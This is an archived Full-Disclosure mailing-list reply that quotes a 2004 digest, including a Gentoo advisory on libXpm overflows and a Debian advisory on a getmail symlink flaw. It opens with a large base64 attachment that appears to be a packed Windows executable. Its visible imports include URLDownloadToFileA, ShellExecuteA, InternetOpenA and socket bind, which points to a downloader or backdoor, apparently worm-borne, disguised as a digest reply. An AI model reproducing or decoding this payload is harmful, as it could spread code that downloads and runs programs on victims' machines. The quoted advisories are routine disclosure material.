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 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAMAAAAgAACADgAAAGAAAIAAAAAA AAAAAAAAAAAAAAEAAQAAADgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAFAAAACk8AAA6AIAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAAAB4AACAAAAAAAAAAAAAAAAAAAABAAAAAACQAAAA kPMAABQAAAAAAAAAAAAAAKDAAAAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAICAgADAwMAAAAD/AAD/AAAA//8A /wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHd3d3 d3d3AAAAAAAAAAAAB4iIiIiIhwAAAAAAAAAAAAc4iDM4iDcAAAAAAAAAAAAHs4MAA4OHAAAA AAAAAAAAB/8w/7A4hwAAAAAAAAAAAAe4D7//A4cAAAAAAAAAAAAHgL//v/A3AAAAAAAAAAAA Bw//v/+/AwAAAAAAAAAAAAf/v/+//7AAAAAAAAAAAAAHd3d3d3d3AAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA//////////////// //////////////////////////////////////////////////////////////////////// ////////gAH//4AB//+AAf//gAH//4AB//+AAf//gAH//4AB//+AAf//gAH//4AB//////// //////////+IwwAAAAABAAEAICAQAAEABADoAgAAAQAAAAAAAAAAAAAAAADY9AAAgPQAAAAA AAAAAAAAAAAAAOX0AACQ9AAAAAAAAAAAAAAAAAAA8vQAAJj0AAAAAAAAAAAAAAAAAAD89AAA oPQAAAAAAAAAAAAAAAAAAAb1AACo9AAAAAAAAAAAAAAAAAAAEvUAALD0AAAAAAAAAAAAAAAA AAAe9QAAuPQAAAAAAAAAAAAAAAAAACn1AADA9AAAAAAAAAAAAAAAAAAANPUAAMj0AAAAAAAA AAAAAAAAAABA9QAA0PQAAAAAAAAAAAAAAAAAAAAAAAAAAAAATPUAAFr1AABq9QAAAAAAAHj1 AAAAAAAAhvUAAAAAAACQ9QAAAAAAAJ71AAAAAAAArvUAAAAAAAC49QAAAAAAAMz1AAAAAAAA 2PUAAAAAAADo9QAAAAAAAEtFUk5FTDMyLkRMTABhZHZhcGkzMi5kbGwAZ2RpMzIuZGxsAG9s ZTMyLmRsbABTSEVMTDMyLmRsbABzaGx3YXBpLmRsbAB1cmxtb24uZGxsAHVzZXIzMi5kbGwA d2luaW5ldC5kbGwAd3NvY2szMi5kbGwAAABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNz AABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3NlS2V5AAAARGVsZXRlREMAAENvSW5pdGlhbGl6ZQAA U2hlbGxFeGVjdXRlQQAAAFN0ckR1cEEAAABVUkxEb3dubG9hZFRvRmlsZUEAAHdzcHJpbnRm QQAAAEludGVybmV0T3BlbkEAAABiaW5kAAAAAAAAAAAAAAAAAAAAAAAAarlfniVax2t8t1uc XI5nvGp5vmA0phl0P2CpmCEjKEVBqsexWRhJEy9lsBmCX0zGshCuUxWpVyypnYW3Qwaqt3Mi nUiiOXMxc1NAxRBYES91WHxPHXgVxauCOB1QopqyQFGLEX29fnyye2krvHYagMWrpnwLnFeK RbSKEC22k0iydLtPpUpjcEy0J8axYYSte7IfjCWtrbjCDLFmF3GKQVcgwFAGmmJzQTIsbhOw nsNBDAs3cU51pARZpYZ9badcbXlEmbIcEK89NbPDfLuNYyW0qjc1BohnbsG8S6UQRJ9siAEn uG5WXRt/q1GLQpqjWKazVEzAqYajhAWxkkurtncHoaMwqDGatllGfUMiP00POSCCu0tcDWWZ vGQpIrudlHZYCZYeUHNAfkO3rW+BXbpNmUdIC2ZPHCXBw1UAP4pULplSbJVSLxoOkwI5dVd5 RlOlDZlFS3IxP7phmZ2AXZaoDVZ1hgwatqMlIzkyOndumxN9D0BeNAKudyqiOQDFaypHh6m4 MgNHDloKbKEEkaV6tQ6voX4fFIO6tEI1KERFTXERW8YeWx8eq6uolSyfTJqDl3F2e30pG2A3 cp9/E4ZAtTRZx3oJNwGaHsBImzmylaRAfK6LiQ4Cr09hoLVaU3UVJjakqxMFb28Hv5dorjpI jJJJT4ZFjwsCPEkcVGmqSYJgtcBaCKJKqDuXVza6e6NSQaEEmzoKBYs3XL6LDHSXIxlnjYFO mqM+MqketDctiy2p ----------tthzhwewredcturxosqp-- --__--__-- Message: 15 Date: Mon, 27 Sep 2004 11:44:23 +0200 From: Thierry Carrez <koon () gentoo org> Organization: Gentoo Linux To: gentoo-announce () gentoo org CC: bugtraq () securityfocus com, full-disclosure () lists netsys com, security-alerts () linuxsecurity com Subject: [Full-disclosure] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm This is an OpenPGP/MIME signed message (RFC 2440 and 3156) --------------enigEA6620FABBD9968E5B2250AD Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200409-34 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: X.org, XFree86: Integer and stack overflows in libXpm Date: September 27, 2004 Bugs: #64152 ID: 200409-34 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== libXpm, the X Pixmap library that is a part of the X Window System, contains multiple stack and integer overflows that may allow a carefully-crafted XPM file to crash applications linked against libXpm, potentially allowing the execution of arbitrary code. Background ========== XFree86 and X.org are both implementations of the X Window System. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 x11-base/xorg-x11 < 6.7.0-r2 *>= 6.7.0-r2 == 6.8.0 >= 6.8.0-r1 2 x11-base/xfree < 4.3.0-r7 >= 4.3.0-r7 ------------------------------------------------------------------- # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users. NOTE: Any packages listed without architecture tags apply to all architectures... ------------------------------------------------------------------- NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS, PPC and SPARC architectures: XFree86 users on those architectures should switch to X.org rather than upgrading XFree86. ------------------------------------------------------------------- 2 affected packages ------------------------------------------------------------------- Description =========== Chris Evans has discovered multiple integer and stack overflow vulnerabilities in the X Pixmap library, libXpm, which is a part of the X Window System. These overflows can be exploited by the execution of a malicious XPM file, which can crash applications that are dependent on libXpm. Impact ====== A carefully-crafted XPM file could crash applications that are linked against libXpm, potentially allowing the execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All X.org users should upgrade to the latest version: # emerge sync # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2" # emerge ">=x11-base/xorg-x11-6.7.0-r2" All XFree86 users should upgrade to the latest version: # emerge sync # emerge -pv ">=x11-base/xfree-4.3.0-r7" # emerge ">=x11-base/xfree-4.3.0-r7" Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS, PPC and SPARC architectures: XFree86 users on those architectures should switch to X.org rather than upgrading XFree86. References ========== [ 1 ] X.org Security Advisory http://freedesktop.org/pipermail/xorg/2004-September/003196.html [ 2 ] X11R6.8.1 Release Notes http://freedesktop.org/pipermail/xorg/2004-September/003172.html [ 3 ] CAN-2004-0687 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687 [ 4 ] CAN-2004-0688 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200409-34.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security () gentoo org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 --------------enigEA6620FABBD9968E5B2250AD Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS oxM9KaPNaz3q7G2WAXIvbrg= =OQU0 -----END PGP SIGNATURE----- --------------enigEA6620FABBD9968E5B2250AD-- --__--__-- Message: 16 Date: Mon, 27 Sep 2004 11:44:23 +0200 From: Thierry Carrez <koon () gentoo org> Organization: Gentoo Linux Cc: bugtraq () securityfocus com, full-disclosure () lists netsys com, security-alerts () linuxsecurity com To: andreas.zuercher () telma ch Subject: [Full-disclosure] [gentoo-announce] [ GLSA 200409-34 ] X.org, XFree86: Integer and stack overflows in libXpm This is an OpenPGP/MIME signed message (RFC 2440 and 3156) --------------enigEA6620FABBD9968E5B2250AD Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200409-34 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: X.org, XFree86: Integer and stack overflows in libXpm Date: September 27, 2004 Bugs: #64152 ID: 200409-34 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== libXpm, the X Pixmap library that is a part of the X Window System, contains multiple stack and integer overflows that may allow a carefully-crafted XPM file to crash applications linked against libXpm, potentially allowing the execution of arbitrary code. Background ========== XFree86 and X.org are both implementations of the X Window System. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 x11-base/xorg-x11 < 6.7.0-r2 *>= 6.7.0-r2 == 6.8.0 >= 6.8.0-r1 2 x11-base/xfree < 4.3.0-r7 >= 4.3.0-r7 ------------------------------------------------------------------- # Package 2 [x11-base/xfree] only applies to ALPHA and x86 users. NOTE: Any packages listed without architecture tags apply to all architectures... ------------------------------------------------------------------- NOTE: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS, PPC and SPARC architectures: XFree86 users on those architectures should switch to X.org rather than upgrading XFree86. ------------------------------------------------------------------- 2 affected packages ------------------------------------------------------------------- Description =========== Chris Evans has discovered multiple integer and stack overflow vulnerabilities in the X Pixmap library, libXpm, which is a part of the X Window System. These overflows can be exploited by the execution of a malicious XPM file, which can crash applications that are dependent on libXpm. Impact ====== A carefully-crafted XPM file could crash applications that are linked against libXpm, potentially allowing the execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All X.org users should upgrade to the latest version: # emerge sync # emerge -pv ">=x11-base/xorg-x11-6.7.0-r2" # emerge ">=x11-base/xorg-x11-6.7.0-r2" All XFree86 users should upgrade to the latest version: # emerge sync # emerge -pv ">=x11-base/xfree-4.3.0-r7" # emerge ">=x11-base/xfree-4.3.0-r7" Note: Usage of XFree86 is deprecated on the AMD64, HPPA, IA64, MIPS, PPC and SPARC architectures: XFree86 users on those architectures should switch to X.org rather than upgrading XFree86. References ========== [ 1 ] X.org Security Advisory http://freedesktop.org/pipermail/xorg/2004-September/003196.html [ 2 ] X11R6.8.1 Release Notes http://freedesktop.org/pipermail/xorg/2004-September/003172.html [ 3 ] CAN-2004-0687 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0687 [ 4 ] CAN-2004-0688 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0688 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200409-34.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security () gentoo org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2004 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 --------------enigEA6620FABBD9968E5B2250AD Content-Type: application/pgp-signature; name="signature.asc" Content-Description: OpenPGP digital signature Content-Disposition: attachment; filename="signature.asc" -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFBV+EAvcL1obalX08RAus+AJ9Og0NSi/Uf/i3Rw0656rai7fKZMwCeJVWS oxM9KaPNaz3q7G2WAXIvbrg= =OQU0 -----END PGP SIGNATURE----- --------------enigEA6620FABBD9968E5B2250AD-- --__--__-- Message: 17 Date: Mon, 27 Sep 2004 12:34:05 +0200 (CEST) Reply-To: full-disclosure () lists netsys com From: debian-security-announce () lists debian org To: full-disclosure () lists netsys com Subject: [Full-disclosure] [SECURITY] [DSA 553-1] New getmail packages fix root compromise -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 553-1 security () debian org http://www.debian.org/security/ Martin Schulze September 27th, 2004 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : getmail Vulnerability : symlink vulnerability Problem-Type : local Debian-specific: no CVE ID : CAN-2004-0880 CAN-2004-0881 Debian Bug : 272561 A security problem has been discovered in getmail, a POP3 and APOP mail gatherer and forwarder. An attacker with a shell account on the victims host could utilise getmail to overwrite arbitrary files when it is running as root. For the stable distribution (woody) this problem has been fixed in version 2.3.7-2. For the unstable distribution (sid) this problem has been fixed in version 3.2.5-1. We recommend that you upgrade your getmail package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.dsc Size/MD5 checksum: 583 6263f8d2d75ec3eb21dd302e0b9d6729 http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2.diff.gz Size/MD5 checksum: 2645 ff40d8f72744bfec8a963ece950e0bcd http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7.orig.tar.gz Size/MD5 checksum: 70944 4eef6be77a4cbe1a86eef75affd31b05 Architecture independent components: http://security.debian.org/pool/updates/main/g/getmail/getmail_2.3.7-2_all.deb Size/MD5 checksum: 74388 f2b9e79b1ddd8ef8bf719d4e1894f051 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce () lists debian org Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.5 (GNU/Linux) iD8DBQFBV+ydW5ql+IAeqTIRAjKVAJ4jTCBi6jY/HaghCNdQUVfyy2giOQCbB688 7yr1RQ2U25tXqQDxJZqHyPE= =3lYo -----END PGP SIGNATURE----- --__--__-- _______________________________________________ Full-Disclosure mailing list Full-Disclosure () lists netsys com http://lists.netsys.com/mailman/listinfo/full-disclosure End of Full-Disclosure Digest
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs milw0rm Inc. (Sep 28)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs DanB UK (Sep 28)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs Barry Fitzgerald (Sep 28)
- RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 Geo. (Sep 28)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 Barry Fitzgerald (Sep 28)
- RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 Geo. (Sep 28)
- <Possible follow-ups>
- RE: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs Todd Towles (Sep 29)
- Re: [Full-Disclosure] Re: Full-disclosure digest, Vol 1 #1933 - 20 msgs DanB UK (Sep 29)
- Message not available